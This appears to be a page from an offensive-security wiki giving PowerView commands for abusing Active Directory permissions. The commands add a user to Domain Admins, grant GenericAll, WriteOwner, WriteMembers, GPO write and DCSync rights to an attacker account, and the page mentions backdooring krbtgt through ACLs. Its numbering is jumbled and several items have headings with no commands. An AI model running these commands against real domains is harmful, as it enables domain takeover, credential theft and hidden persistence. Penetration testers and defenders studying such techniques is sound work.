search
githubEdit

Exploitation with Powerview

hashtag
Examples:

  1. Add a user to the Domain Admins Group (Generic Write/Generic All privileges on the DA Group)

     Add-DomainGroupMember -Identity 'Domain Admins' -Members 'USER' -Credential $Cred

  2. Add permissions to a user (Write permissions)

     Add-ObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights WriteProperty

  3. Add GenericAll Permissions (Full Control)

     Add-ObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights GenericAll

  4. Add Permissions for DCSync (Replicating Directory Changes)

     Add-ObjectAcl -TargetIdentity "DC=example,DC=com" -PrincipalIdentity <attacker_username> -Rights DCSync

  5. Grant Permissions on Group Membership

     Add-ObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity <attacker_username> -Rights WriteMembers

Once granted, you can add yourself to the group using Add-DomainGroupMember

  1. Modify GPO permissions

     Add-ObjectAcl -TargetIdentity "Default Domain Policy" -PrincipalIdentity <attacker_username> -Rights WriteProperty

  2. Abuse WriteOwner permissions (Grant yourself the WriteOwner permission)

If you grant yourself the WriteOwner permission, you can change the owner of an object (e.g., a user or group) to yourself and escalate privileges.

    Add-ObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights WriteOwner

8) Modify passwords for persistence and privilege escalation

10) Backdoor an Object via ACLs

You can add backdoor permissions (e.g., GenericAll) on critical objects like Domain Admins or krbtgt.

10) Remove Permissions (Cleanup)

PreviousBloodyADNextSharpGPOAbuse

Last updated